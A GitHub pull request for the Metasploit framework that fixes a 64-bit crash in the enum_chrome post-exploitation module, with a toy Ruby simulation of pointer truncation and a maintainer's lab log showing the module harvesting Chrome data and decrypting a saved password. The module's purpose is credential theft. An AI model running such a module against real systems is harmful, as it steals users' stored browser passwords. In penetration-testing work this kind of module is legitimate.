
Fix #18544: Support x64 in enum_chrome #18558

Merged
merged 2 commits into rapid7:master
Nov 21, 2023

Conversation


@zeroSteiner zeroSteiner commented Nov 20, 2023

The enum_chrome module's #decrypt_data method was crashing on 64-bit sessions due to an incorrect railgun definition for the LocalAlloc function. LocalAlloc was defined as having a return value of DWORD when it should in fact be HANDLE. When it was defined as DWORD, the 64-bit value would be truncated to 32 bits, causing the write operation to trigger a memory access violation which in turn caused the session to crash.

Fixed the issue by correcting the definition of LocalAlloc.

#decrypt_data Refactoring

I also made the following changes to #decrypt_data since I was looking at it so closely:

  • Removed an unused assignment to memsize
  • Check that the initial memory was actually allocated before writing to it
  • Don't pass 16 to CryptUnprotectData as the ppszDataDescr parameter because it is not a valid LPWSTR
  • Don't leak memory in the event that CryptUnprotectData by ensuring mem and addr are always freed
  • Combine free calls into one for speed
  • Don't assume the session is ARCH_X64 if it is not ARCH_X86 because that may change some day

Verification

  • Install Chrome on a Windows target
  • Add at least one saved password to Chrome (log into a website and allow Chrome to save the password for you)
  • Start msfconsole
  • Open a 64-bit Meterpreter session
  • Run the post/windows/gather/enum_chrome module and see that the session does not crash

Railgun should not be using DWORD for pointer sizes because it breaks
things on 64-bit sessions.

Fixes rapid7#18544

* Check that the initial memory was actually allocated before writing to
  it
* Don't pass 16 to CryptUnprotectData as the ppszDataDescr parameter
  because it is not a valid LPWSTR
* Don't leak memory in the event that CryptUnprotectData by ensuring mem
  and addr are always freed
* Combine free calls into one for speed
* Don't assume the session is ARCH_X64 if it is not ARCH_X86 because
  that may change some day
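To make the pointer-width problem concrete, here is an added Ruby example. It is not code from this PR or from Metasploit's railgun: it models railgun's declared-type table and a target process with a toy `FakeProcess` class, and the `WIDTH`, `PTR_WIDTH`, `DOCUMENTED_RETURN`, `decode_return`, `alloc_and_write` and `definition_problems` names are assumptions made for the example. It shows why a `LocalAlloc` declared as returning `DWORD` works on x86 but yields a truncated address and an access violation on x64, includes the "was it really allocated?" check the PR adds, and goes a step beyond the PR with a small lint that flags any definition whose declared return width differs from the documented one on a given architecture.

```ruby
# Added example, not code from the PR or from Metasploit. It models how a
# railgun return-type declaration selects how many bytes of the native return
# value survive, and why DWORD is wrong for a pointer-returning function.

# Toy type table (assumption): fixed-width types and :ptr for pointer-sized ones.
WIDTH = { 'DWORD' => 4, 'BOOL' => 4, 'HANDLE' => :ptr, 'LPVOID' => :ptr }.freeze
PTR_WIDTH = { 'ARCH_X86' => 4, 'ARCH_X64' => 8 }.freeze

# Documented return types of a few Win32 functions (HLOCAL is pointer-sized, so
# it is modelled as HANDLE here). This table is an assumption for the example.
DOCUMENTED_RETURN = {
  'LocalAlloc' => 'HANDLE', 'VirtualAlloc' => 'LPVOID', 'GetLastError' => 'DWORD'
}.freeze

def type_width(type, arch)
  w = WIDTH.fetch(type)
  w == :ptr ? PTR_WIDTH.fetch(arch) : w
end

# Mask the raw native return value to the width of the declared type; this is
# where a 64-bit pointer loses its upper 32 bits when declared as DWORD.
def decode_return(raw, declared_type, arch)
  raw & ((1 << (type_width(declared_type, arch) * 8)) - 1)
end

# Minimal stand-in for a target process: one heap region per allocation.
class FakeProcess
  def initialize(arch)
    @arch = arch
    @regions = {}
  end

  # Constructed addresses: x64 heap allocations usually sit above 4 GiB.
  def local_alloc(size)
    base = @arch == 'ARCH_X64' ? 0x00007ff612340000 : 0x00340000
    @regions[base] = size
    base
  end

  # A write must land entirely inside a mapped region, else it faults.
  def write(addr, data)
    hit = @regions.find { |base, size| addr >= base && addr + data.bytesize <= base + size }
    raise format('access violation at 0x%x', addr) unless hit
    true
  end
end

# What the module does: allocate, then write the encrypted blob into the buffer.
# Returns :ok, :alloc_failed, or the fault message.
def alloc_and_write(proc, arch, declared_type, data)
  raw  = proc.local_alloc(data.bytesize)
  addr = decode_return(raw, declared_type, arch)
  return :alloc_failed if addr == 0 # the allocation check the PR adds
  proc.write(addr, data)
  :ok
rescue RuntimeError => e
  e.message
end

# Lint: report definitions whose declared return width differs from the
# documented width on the given architecture. On x86 DWORD and HANDLE are both
# 4 bytes, which is why this bug only surfaced on 64-bit sessions.
def definition_problems(defs, arch)
  defs.each_with_object([]) do |(name, declared), out|
    expected = DOCUMENTED_RETURN[name]
    next unless expected
    dw, ew = type_width(declared, arch), type_width(expected, arch)
    next if dw == ew
    out << "#{name}: declared #{declared} (#{dw} bytes) but returns #{expected} (#{ew} bytes) on #{arch}"
  end
end

if __FILE__ == $PROGRAM_NAME
  blob = 'constructed-ciphertext'
  %w[ARCH_X86 ARCH_X64].each do |arch|
    %w[DWORD HANDLE].each do |t|
      puts "#{arch} LocalAlloc as #{t}: #{alloc_and_write(FakeProcess.new(arch), arch, t, blob)}"
    end
  end
  puts definition_problems([['LocalAlloc', 'DWORD'], ['GetLastError', 'DWORD']], 'ARCH_X64')
end
```

Running it prints `:ok` for every combination except `ARCH_X64 LocalAlloc as DWORD`, which reports the fault at the truncated address, and the lint lists only the `LocalAlloc` entry on x64 and nothing on x86. The same width comparison can be applied to any new railgun definition before it ships, which is cheaper than discovering the mismatch as a dead session.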
@adfoster-r7
Contributor

Works for me on x86 and x64 👍

Scenario: No decryption required:

[*] Starting interaction with 5...

meterpreter > run post/windows/gather/enum_chrome

[*] Impersonating token: 3344
[*] Running as user 'WINDEV\vagrant'...
[*] Extracting data for user 'vagrant'...
[+] Downloaded Web Data to '/Users/user/.msf4/loot/20231121152225_default_192.168.123.132_chrome.raw.WebD_977664.txt'
[-] Cookies not found
[+] Downloaded History to '/Users/user/.msf4/loot/20231121152225_default_192.168.123.132_chrome.raw.Histo_024651.txt'
[+] Downloaded Login Data to '/Users/user/.msf4/loot/20231121152226_default_192.168.123.132_chrome.raw.Login_320716.txt'
[-] Bookmarks not found
[+] Downloaded Preferences to '/Users/user/.msf4/loot/20231121152226_default_192.168.123.132_chrome.raw.Prefe_439737.txt'
meterpreter

Scenario: With decryption (via 'logging in' to https://www.w3schools.com/howto/howto_css_login_form.asp)

meterpreter > run post/windows/gather/enum_chrome

[*] Impersonating token: 3344
[*] Running as user 'WINDEV\vagrant'...
[*] Extracting data for user 'vagrant'...
[+] Downloaded Web Data to '/Users/user/.msf4/loot/20231121152418_default_192.168.123.132_chrome.raw.WebD_049324.txt'
[-] Cookies not found
[+] Downloaded History to '/Users/user/.msf4/loot/20231121152419_default_192.168.123.132_chrome.raw.Histo_843338.txt'
[+] Downloaded Login Data to '/Users/user/.msf4/loot/20231121152420_default_192.168.123.132_chrome.raw.Login_249387.txt'
[-] Bookmarks not found
[+] Downloaded Preferences to '/Users/user/.msf4/loot/20231121152420_default_192.168.123.132_chrome.raw.Prefe_921904.txt'
[*] Found password encrypted with masterkey
[+] Found masterkey!
[+] Decrypted data: url:https://www.w3schools.com/howto/howto_css_login_form.asp foo:bar
[+] Decrypted data saved in: /Users/user/.msf4/loot/20231121152421_default_192.168.123.132_chrome.decrypted_658428.txt
meterpreter > cat /Users/user/.msf4/loot/20231121152421_default_192.168.123.132_chrome.decrypted_658428.txt
[-] stdapi_fs_stat: Operation failed: The system cannot find the path specified.
meterpreter > lcat /Users/user/.msf4/loot/20231121152421_default_192.168.123.132_chrome.decrypted_658428.txt
Decrypted data
==============

 Name  Decrypted Data  Origin
 ----  --------------  ------
 foo   bar             https://www.w3schools.com/howto/howto_css_login_form.asp

Verified the crash in #18559 too

@adfoster-r7 adfoster-r7 merged commit 7f8da5a into rapid7:master Nov 21, 2023
37 checks passed
@adfoster-r7
Contributor

Release Notes

Fixes a crash in the post/windows/gather/enum_chrome module which can be used to decrypt passwords stored by the user in Chrome

Labels
bug module rn-fix release notes fix
Closes issue #18544: All windows x64_meterpreter based sessions (both staged & stageless) die upon decrypting chrome's masterkey